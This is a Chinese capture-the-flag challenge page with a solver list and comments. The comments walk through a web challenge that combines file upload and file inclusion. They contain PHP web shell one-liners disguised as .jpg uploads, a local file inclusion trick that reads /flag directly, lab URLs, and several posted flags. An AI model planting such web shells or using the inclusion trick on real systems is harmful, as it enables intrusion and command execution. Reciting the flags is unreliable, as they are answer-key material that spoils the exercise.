评分(5)
解题动态
zzy12 攻破了该题 16小时前
jiubanyipeng 攻破了该题 20小时前
spanky 攻破了该题 21小时前
19503801468 攻破了该题 22小时前
GOOFY 攻破了该题 22小时前
soyotion 攻破了该题 1天前
15896890893 攻破了该题 1天前
weifr 攻破了该题 1天前
王者荣耀 攻破了该题 1天前
一羽轻鸿 攻破了该题 1天前
lzq2000 攻破了该题 2天前
15565188223 攻破了该题 2天前
18625389302 攻破了该题 2天前
mky123 攻破了该题 2天前
yy56 攻破了该题 2天前
15837580324 攻破了该题 2天前
19034171811 攻破了该题 2天前
EMO123654 攻破了该题 2天前
3078029457 攻破了该题 2天前
评论
shingu 1月前
举报
file=/flag,怎么会这么简单?
volnu1l 3月前
举报
新建txt,保存jpg <script language=php>system("ls /flag&&cat /flag")</script> 访问?file=upload/.jpg
yanqiye 5月前
举报
用file=/flag取巧做法,真正做题名字肯定要变,预期做法:传一句话,发现php标签被删了,直接用<?= @eval($_POST[1]);就可以了。
G3tcH4r 6月前
举报
花金币看了WP,不过自己试了下,发现script 设置language为php,也可以传能执行命令的马儿,这题蛮有意思
迷茫的三千面 6月前
举报
flag{414a91ba57a5e0b5a4eb725b75f5030e}
hao7 6月前
举报
flag{69fc76f3ef98a524a3ef56977fc02278}
CHLing 11月前
举报
http://114.67.175.224:18550/index.php?file=//flag
qiusheng 1年前
举报
1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX
xiaoxiao972521 1年前
举报
虽然index.php?file=/flag 就出来了,但是依旧执着的绕过了upload.php
冯飞99 1年前
举报
绕来绕去看到你的评论一把过
zzccbb2005 1年前
举报
http://114.67.175.224:10017/index.php?file=file:///flag flag{27d76583b9a54c6ef8af91f66855ac12}